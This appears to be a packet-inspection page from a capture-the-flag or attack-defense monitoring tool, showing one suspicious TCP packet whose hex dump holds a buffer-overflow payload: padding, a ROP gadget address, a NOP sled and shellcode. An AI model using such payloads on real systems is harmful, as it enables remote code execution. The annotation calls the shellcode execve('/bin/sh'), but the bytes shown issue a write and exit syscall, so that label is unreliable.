D0kdo Orchestrator

Packet pkt-0042

TCP · 4096B

Back to Packets

Packet Info

pkt-0042

Protocol

TCP

Size

4096 bytes

Created

14:17:45 (R40)

Source IP

0.0.0.0

Dest IP

10.60.1.1

Tags

suspicious

Extracted Payloads

Type	Content	Offset
ROP	0x00401337 (pop rdi; ret)	0x00c8
Shellcode	execve('/bin/sh')	0x00e0

TCP Stream

SRC: 0.0.0.0 (마스킹)

DST: 10.60.1.1

00000000  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
*
000000c0  41 41 41 41 41 41 41 41  37 13 40 00 00 00 00 00  |AAAAAAAA7.@.....|
000000d0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000e0  48 31 c0 48 89 c2 48 89  c6 48 8d 3d 1a 00 00 00  |H1.H..H..H.=....|
000000f0  b0 01 0f 05 48 31 ff b0  3c 0f 05 2f 62 69 6e 2f  |....H1..<../bin/|
00000100  73 68 00                                            |sh.             |